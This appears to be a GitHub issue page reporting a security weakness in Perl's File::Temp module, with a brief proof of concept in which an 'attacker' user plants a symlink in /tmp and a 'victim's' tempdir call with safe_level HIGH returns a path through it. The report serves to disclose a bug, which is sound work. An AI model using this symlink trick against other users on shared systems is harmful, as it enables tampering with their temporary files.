You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Example...
As user "attacker":
ln -s /tmp /tmp/exploit
As user "victim":
perl -MFile::Temp -e 'File::Temp->safe_level(File::Temp::HIGH); print
File::Temp::tempdir("/tmp/exploit/meXXXX") . "\n";'
The temporary directory path that is returned includes the symlink owned
by the "attacker" user.